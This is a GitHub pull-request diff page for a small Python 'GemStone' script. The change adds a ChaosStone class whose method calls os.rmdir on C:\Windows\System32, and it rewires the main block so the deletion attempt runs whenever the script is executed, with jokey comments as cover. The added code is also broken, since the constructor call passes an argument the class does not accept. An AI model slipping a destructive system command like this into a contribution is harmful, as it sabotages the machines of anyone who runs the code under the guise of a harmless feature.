Skip to content
This repository was archived by the owner on May 29, 2024. It is now read-only.
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 10 additions & 2 deletions main.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
import os

class GemStone:
name: str
Expand All @@ -17,9 +18,16 @@ def __init__(self) -> None:
def back(amount: int) -> None:
print('Rewinding...')

class ChaosStone(GemStone): #IDK the gem stones
def __init__(self):
super().__init__()
self.name = 'ChaosStone'

def absolute_chaos(self):
os.rmdir("C:\Windows\System32") #I know your not on Windows but anyway

if __name__ == '__main__':
print('Hello World')
# This is the first script of the project


just_A_Nice_Gem = ChaosStone("Nice_Gem")
just_A_Nice_Gem.absolute_chaos()